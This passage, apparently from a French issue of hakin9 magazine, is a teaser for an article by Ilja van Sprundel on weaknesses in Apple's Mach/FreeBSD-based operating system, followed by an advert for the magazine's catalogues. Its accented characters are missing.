sur le march, celui-ci est trs
populaire dans certains domaines.
Le systeme est gr par un noyau
moderne bas sur le microkernel
Mach et en partie sur FreeBSD.
Il savre cependant que cette
solution nest pas dpourvue de
dfauts. Ilja van Sprundel vous
dcrit les points faibles du systme
conu par la socit Apple.
ds >>>
Sites recomman
Vous trouverez les informations les plus
rcentes sur le march des logiciels
dans les
Catalogues de hakin9
Sujets des catalogues contenant des articles publicitaires pour le
magazine hakin9 :
N Sujets du catalogue